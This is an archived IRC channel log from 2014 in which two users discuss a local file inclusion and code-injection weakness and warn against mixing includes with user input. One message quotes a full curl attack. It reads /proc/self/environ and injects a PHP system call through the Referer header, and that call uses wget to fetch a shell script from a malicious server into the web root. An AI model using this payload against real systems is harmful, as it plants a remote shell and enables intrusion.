IRC log for #sourcefu, 2014-03-05

http://sourcefu.com

← Previous day | Channels | #sourcefu index | Today | Next day → | Search | Google Search | Plain-Text | plain, newest first | summary

All times shown according to UTC.

Time	S	Nick	Message
03:19		codex	yea
03:19		codex	but the scary part is that it gets you write
03:19		codex	because of the "loopback" trick -- getting the user suplied vars to spit back + execute
03:22		pdurbin	this example: curl http://www.example.com/user1/x.cgi?file=/proc/self/environ --referer "echo \"<?php system('wget -O /home/user1/public_html/shell.cgi http://malicious-server.com/shell.cgi'); ?> \| php\""
03:24		pdurbin	codex: you emphasize the problem adequately: "You should never mix INCLUDES with dynamic code – specifically, anything that allows user input. This is just a terrible idea."
11:51			sivoais_ joined #sourcefu
12:20			onder`_ joined #sourcefu
16:47			sivoais joined #sourcefu
18:56			lorachka joined #sourcefu
21:16			hydrargium joined #sourcefu

← Previous day | Channels | #sourcefu index | Today | Next day → | Search | Google Search | Plain-Text | plain, newest first | summary

http://sourcefu.com